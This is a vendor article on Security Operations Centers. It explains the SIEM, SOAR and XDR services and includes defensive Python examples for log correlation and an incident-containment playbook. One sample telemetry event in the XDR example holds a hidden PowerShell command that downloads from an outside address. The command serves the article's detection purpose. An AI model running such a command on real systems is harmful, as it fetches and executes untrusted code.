
What is an SOC (Security Operations Center) and why companies really need one

Managing security on behalf of companies is a specialist activity which the Lutech Group offers to over a thousand companies in Italy, thanks to a team of 30 people and platforms from market-leading vendors such as Fortinet.

More than 1,000 clients managed

Our Next-Generation SOC has been active for over fifteen years, managing IT security for more than a thousand corporate and public clients, handling over 30,000 security tickets for more than 3,000 devices managed in total.


Saying what an SOC (Security Operations Center) is takes one sentence; understanding how it works, what services it provides and why it is becoming more and more strategically important for companies requires some additional information.

We should immediately clarify that SOC can also mean a Service Operations Center, where all of a company's application services are managed. Here we use SOC to mean Security Operations Center. That said, security management services are in any case a significant part of what a Service Operations Center supplies.

Lutech Group’s NG-SOC, Next-Generation Security Operations Center, is one of the largest and most complete in Italy. It is an operations center in which a team of over 30 certified and specialized technicians supplies and manages a wide catalogue of modular and flexible 24/7 services, based on recognized standard processes and international best practices. Of these, the security services are undoubtedly the most significant.

Lutech's NG-SOC services include:

Cybersecurity Assessment
Ethical Hacking
Cyber Threat Intelligence
Advanced Device Management
Real-Time Device Monitoring
Incident Identification & Notification
Alert & Early Warning
Incident Analysis & Triage
Incident Containment & Response.

Why place your trust in an SOC (Security Operations Center) of an IT partner

An SOC is a control center from which the security of a company's IT infrastructure is monitored and managed. Initially, SOCs were created by enterprises, which incorporated them in their own data centers.

Alongside the spread of as-a-service delivery for applications, the cloud transposed the same model onto infrastructure. It began as public cloud offered by hyperscalers, was then adopted as private cloud to bring the model to on-premises installations, and has since become a combination of several environments (hybrid and multicloud): in a word, distributed.

This distributed structure, together with the growing share of corporate workloads running outside the company perimeter, called for a new protection model for heterogeneous environments, one that can only be delivered through a unified control center. Moreover, placing an SOC "on top" of the distributed infrastructure lets smaller companies obtain enterprise-class protection as well, since clients pay a fixed fee calculated on the basis of their architecture and business goals.

Security management and monitoring resources are thus "democratically" made available to all companies, regardless of size and budget. It is precisely these economies of scale, and the cost savings that emerge when the TCO and ROI of building an internal center are compared, which naturally push the market towards an external SOC managed by an IT partner.

The goals of an SOC (Security Operations Center)

An SOC contains complementary application services and security platforms designed to:

  • Provide a standard of proactive protection
  • Offer 24/7 monitoring of the infrastructure
  • React immediately to alerts and incidents
  • Restore operation of the infrastructure after an outage or compromise
  • Bring data and applications into line with compliance requirements
  • Provide security services which are always up to date

Following in-depth preliminary analysis of the client infrastructure, the workloads, the access nodes of the company network and, above all, of the security priorities for data and applications on the basis of the business requirements, the IT partner and the client company are ready to draft a customized service contract with precise SLAs (Service Level Agreements).

We should also point out that the choice of an SOC requires a certain amount of care. It is essential to have guarantees on the expertise, certifications, structure, offering and references of the IT partner, because the client is entrusting the security of its business to an outside entity.

The main service components of an SOC

Lutech is a Fortinet Expert Partner

Fortinet is a worldwide leader in advanced protection of networks and their content, in access security, and in securing public and private clouds and endpoints.


Lutech Group uses various Fortinet solutions in its SOC in Cinisello Balsamo, near Milan, because it is not advisable to rely on a single, all-encompassing platform for security management. In order to guarantee the highest levels of quality to its clients, Lutech Group has assembled a wide portfolio of integrable best-in-class application services, in which each individual component is responsible for a specific task.

Inside a Security Operations Center there are three essential service components, SIEM, SOAR and XDR, each with a specific purpose. An SOC contains more than these three services, but without them it cannot really be considered an SOC at all.

What is SIEM (Security Information & Event Management)

SIEM (Security Information & Event Management), supplied through Fortinet's FortiSIEM solution, is the tool that manages the security events recorded in the logs of the individual IT assets, including IoT devices and equipment. An SIEM platform is an indispensable aid to the technicians of a security operations center: the volume of alerts generated by the activity of an IT infrastructure is very high, and handling them is unthinkable without an application that collects the logs from every asset, normalizes them into a common format and aggregates them so that the events worth identifying and analyzing stand out.

FortiSIEM can also trigger an automatic response or remediation, making it a complete security solution. FortiSIEM is integrable and scalable as well: thanks to a virtual machine-based architecture, its capacity can be extended dynamically when workloads, equipment or devices increase.

The unified FortiSIEM platform also reduces complexity thanks to multi-tenancy (a single instance serving multiple client organizations, each with its own isolated data, rules and views) and multi-vendor support, which guarantees maximum interoperability with the platforms already used by the client. Finally, with FortiSIEM Lutech Group makes use of all the advantages of a single centralized console and a rapid detection system, ensuring a very fast ROI for its clients.
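The two mechanisms described above, normalizing heterogeneous logs into one schema and correlating them per tenant, are easier to grasp in code. The following is an added example written for this article, not FortiSIEM code or anything published by Lutech or Fortinet. The log lines, hostnames, users, tenant names and addresses are constructed for the example; the correlation rule (failed logons from one source against several assets, escalated if a logon then succeeds) is a common SIEM rule written here in plain Python so the logic is visible.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines (hypothetical hosts, users and addresses) as an SIEM
# collector would receive them from two client tenants: an sshd host, a firewall
# and a Windows host for "acme", and a single host for "globex".
RAW_LOGS = [
    ("acme", "2024-05-01T10:00:01Z web01 sshd[2210]: Failed password for root from 203.0.113.7 port 51122 ssh2"),
    ("acme", "2024-05-01T10:00:03Z web01 sshd[2210]: Failed password for root from 203.0.113.7 port 51123 ssh2"),
    ("acme", "2024-05-01T10:00:05Z fw01 kernel: auth=deny user=admin src=203.0.113.7 service=vpn"),
    ("acme", "2024-05-01T10:00:07Z win01 Security: EventID=4625 LogonType=3 IpAddress=203.0.113.7 User=admin"),
    ("acme", "2024-05-01T10:00:09Z web01 sshd[2210]: Failed password for root from 203.0.113.7 port 51124 ssh2"),
    ("acme", "2024-05-01T10:00:20Z web01 sshd[2211]: Accepted password for root from 203.0.113.7 port 51130 ssh2"),
    ("acme", "2024-05-01T10:00:30Z web02 sshd[3100]: Failed password for bob from 198.51.100.5 port 40000 ssh2"),
    ("globex", "2024-05-01T10:00:02Z db01 sshd[100]: Failed password for root from 203.0.113.7 port 50001 ssh2"),
    ("globex", "2024-05-01T10:00:04Z db01 sshd[100]: Failed password for root from 203.0.113.7 port 50002 ssh2"),
]

# One parser per log format; each maps its own fields onto a common event schema.
PATTERNS = [
    ("sshd", re.compile(
        r"^(?P<ts>\S+) (?P<host>\S+) sshd\[\d+\]: (?P<outcome>Failed|Accepted) password "
        r"for (?P<user>\S+) from (?P<src_ip>\S+)")),
    ("firewall", re.compile(
        r"^(?P<ts>\S+) (?P<host>\S+) kernel: auth=(?P<outcome>deny|allow) user=(?P<user>\S+) src=(?P<src_ip>\S+)")),
    ("windows", re.compile(
        r"^(?P<ts>\S+) (?P<host>\S+) Security: EventID=(?P<outcome>462[45]) .*IpAddress=(?P<src_ip>\S+) User=(?P<user>\S+)")),
]
# Vendor-specific outcome values normalized to "fail" / "success".
OUTCOME = {"Failed": "fail", "Accepted": "success", "deny": "fail", "allow": "success",
           "4625": "fail", "4624": "success"}


def normalize(tenant, line):
    """Parse one raw line into the common schema; returns None for unknown formats."""
    for source, pattern in PATTERNS:
        m = pattern.match(line)
        if m:
            f = m.groupdict()
            return {"tenant": tenant, "source": source, "host": f["host"],
                    "ts": datetime.strptime(f["ts"], "%Y-%m-%dT%H:%M:%SZ"),
                    "src_ip": f["src_ip"], "user": f["user"], "outcome": OUTCOME[f["outcome"]]}
    return None


def correlate(events, window=timedelta(seconds=60), threshold=3):
    """Correlation rule: within `window`, at least `threshold` failed logons from one
    source IP against at least two different assets raise a 'high' alert; a logon that
    then succeeds inside the same window raises it to 'critical'. Events are bucketed
    per (tenant, src_ip) so one tenant's logs never feed another tenant's alerts."""
    buckets = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        buckets[(ev["tenant"], ev["src_ip"])].append(ev)

    alerts = []
    for (tenant, src_ip), evs in buckets.items():
        for i, first in enumerate(evs):
            if first["outcome"] != "fail":
                continue
            in_window = [e for e in evs[i:] if e["ts"] - first["ts"] <= window]
            fails = [e for e in in_window if e["outcome"] == "fail"]
            assets = {e["host"] for e in fails}
            if len(fails) >= threshold and len(assets) >= 2:
                success = next((e for e in in_window if e["outcome"] == "success"), None)
                alerts.append({"tenant": tenant, "src_ip": src_ip,
                               "rule": "brute_force_multi_asset",
                               "severity": "critical" if success else "high",
                               "failures": len(fails), "assets": sorted(assets),
                               "compromised": success["host"] if success else None})
                break  # one alert per tenant/source pair, not one per failed logon
    return alerts


def run(raw_logs=RAW_LOGS):
    """Collect -> normalize -> correlate, the pipeline an SIEM runs continuously."""
    events = [ev for ev in (normalize(t, line) for t, line in raw_logs) if ev]
    return correlate(events)


if __name__ == "__main__":
    for alert in run():
        print(alert)
```

Running it yields one alert: the "acme" tenant sees five failures from 203.0.113.7 against three different assets inside a minute, followed by a successful root logon on web01, so the alert is critical and names the compromised host. The same source IP also appears in the "globex" logs, but with only two failures against one host, and because buckets are keyed by tenant those events are neither counted towards acme's alert nor enriched by it: that isolation is what multi-tenancy means in an SIEM.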

What is SOAR (Security Orchestration, Automation and Response)

While an SIEM solution is the foundation of an SOC service, it is not sufficient to guarantee complete protection. This is, in part, because an SIEM solution requires regular tweaking of settings and fine tuning.

Integrated in the Fortinet Security Fabric platform, FortiSOAR offers orchestration, management and automation of security events. Once again, this is a tool designed to simplify the lives of specialists: it unifies operations, reduces the time spent handling alerts, keeps pace with a changing context and cuts the average time required to respond to incidents. In particular, the figure claimed for FortiSOAR is response times up to 98% faster than manual operations.

Another advantage of a SOAR solution is that it aggregates the alerts coming from different IT assets and groups them into discrete incidents. In this way, and thanks also to the available "playbooks", Lutech Group's security specialists gain the time they need to analyze and act on the alerts through a unified view and an automated process.

What is XDR (eXtended Detection & Response)

The last part of an SOC's basic toolkit is a multi-layer detection and response tool. FortiXDR extends the concept of EDR (endpoint detection and response) from the endpoint to the client's entire IT infrastructure.

It is an additional tool which provides a further level of control on top of SIEM and SOAR. Here the work is automatic correlation across multiple security layers (endpoints, email, servers, cloud and network workloads): it surfaces a threat that would go unnoticed in any single silo, because it only becomes visible when an event on one layer is read together with an event from another.
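The cross-silo correlation just described, followed by the playbook-driven response described in the SOAR section, can be shown end to end. The following is an added example written for this article, not FortiXDR or FortiSOAR code and not anything published by Lutech or Fortinet. The telemetry, hosts, users, mailbox addresses and the asset inventory are constructed; the chain it looks for (a macro document delivered, an Office application spawning a script host on the recipient's workstation, then an outbound connection from that workstation) is a standard phishing-to-beacon pattern. The playbook records its containment actions in a list instead of calling real EDR, firewall or ticketing APIs, so the decisions it takes are visible and testable.

```python
from datetime import datetime, timedelta

# Constructed telemetry (hypothetical hosts, users and addresses) from three silos that
# an XDR correlates: the email gateway, the endpoint agent and the firewall. Each event
# on its own looks harmless: the attachment was rated clean, PowerShell runs on
# workstations every day, and HTTPS to an unknown address is ordinary browsing.
EVENTS = [
    {"layer": "email", "ts": "2024-05-01T09:00:00Z", "recipient": "alice@example.com",
     "attachment": "invoice.docm", "verdict": "clean"},
    {"layer": "endpoint", "ts": "2024-05-01T09:04:10Z", "host": "ws-alice", "user": "alice",
     "parent": "winword.exe", "process": "powershell.exe",
     "cmdline": "powershell -nop -w hidden -c iwr https://203.0.113.50/u"},
    {"layer": "network", "ts": "2024-05-01T09:04:15Z", "host": "ws-alice",
     "dst": "203.0.113.50", "dst_port": 443, "bytes_out": 2048},
    {"layer": "endpoint", "ts": "2024-05-01T09:30:00Z", "host": "ws-bob", "user": "bob",
     "parent": "explorer.exe", "process": "powershell.exe", "cmdline": "powershell Get-Date"},
    {"layer": "network", "ts": "2024-05-01T09:31:00Z", "host": "ws-bob",
     "dst": "198.51.100.20", "dst_port": 443, "bytes_out": 512},
]
# Asset inventory (constructed): which mailbox owner works on which workstation.
INVENTORY = {"ws-alice": "alice@example.com", "ws-bob": "bob@example.com"}

MACRO_DOCS = (".docm", ".xlsm", ".pptm")
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "mshta.exe"}


def ts(event):
    return datetime.strptime(event["ts"], "%Y-%m-%dT%H:%M:%SZ")


def correlate_layers(events, inventory, dwell=timedelta(minutes=10), beacon=timedelta(minutes=2)):
    """Cross-silo chain: macro document delivered -> Office app spawns a script host on
    the recipient's workstation within `dwell` -> that host opens an outbound connection
    within `beacon`. Only the complete chain produces an incident."""
    incidents = []
    by_layer = {layer: [e for e in events if e["layer"] == layer]
                for layer in ("email", "endpoint", "network")}
    for mail in by_layer["email"]:
        if not mail["attachment"].lower().endswith(MACRO_DOCS):
            continue
        host = next((h for h, owner in inventory.items() if owner == mail["recipient"]), None)
        if host is None:
            continue
        for spawn in by_layer["endpoint"]:
            if (spawn["host"] != host or spawn["parent"] not in OFFICE_APPS
                    or spawn["process"] not in SCRIPT_HOSTS
                    or not ts(mail) <= ts(spawn) <= ts(mail) + dwell):
                continue
            for conn in by_layer["network"]:
                if conn["host"] == host and ts(spawn) <= ts(conn) <= ts(spawn) + beacon:
                    incidents.append({
                        "severity": "critical", "host": host, "user": spawn["user"],
                        "c2": conn["dst"], "attachment": mail["attachment"],
                        "chain": [f"email:{mail['attachment']} ({mail['verdict']})",
                                  f"endpoint:{spawn['parent']} -> {spawn['process']}",
                                  f"network:{conn['dst']}:{conn['dst_port']}"]})
                    break
    return incidents


def run_playbook(incident):
    """SOAR-style playbook: open a ticket, then contain. Each step appends an
    (action, target) pair; a real SOAR would map these onto EDR, firewall, mail
    gateway and identity-provider API calls."""
    actions = [("ticket.open", f"{incident['host']}: {' | '.join(incident['chain'])}")]
    if incident["severity"] == "critical":
        actions.append(("edr.isolate_host", incident["host"]))
        actions.append(("firewall.block_ip", incident["c2"]))
        actions.append(("mail.quarantine_attachment", incident["attachment"]))
        actions.append(("iam.force_password_reset", incident["user"]))
    return actions


def run(events=EVENTS, inventory=INVENTORY):
    return [(inc, run_playbook(inc)) for inc in correlate_layers(events, inventory)]


if __name__ == "__main__":
    for incident, actions in run():
        print(incident)
        for action in actions:
            print("  ", *action)
```

Only ws-alice produces an incident: the gateway had marked the attachment clean, the endpoint agent saw a PowerShell launch it would also see on ws-bob, and the firewall saw one more HTTPS flow; none of the three silos had grounds to alert, and the chain appears only once the three records are read together. Remove the network event and the chain is incomplete, so nothing fires. A practitioner should note that the playbook isolates the host before blocking the address, because a beaconing implant that loses its first address will usually try another.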

Ultimately, the management and monitoring services that an SOC provides for application and infrastructure activity rest on a set of specific solutions that interpret and aggregate the information in the logs of the various IT assets. These solutions exist to simplify the IT partner's security work and, thanks to machine learning, automation and predefined management models, they deliver timely and consistent responses to the security issues that emerge from the many logs generated by the components of the IT infrastructure.
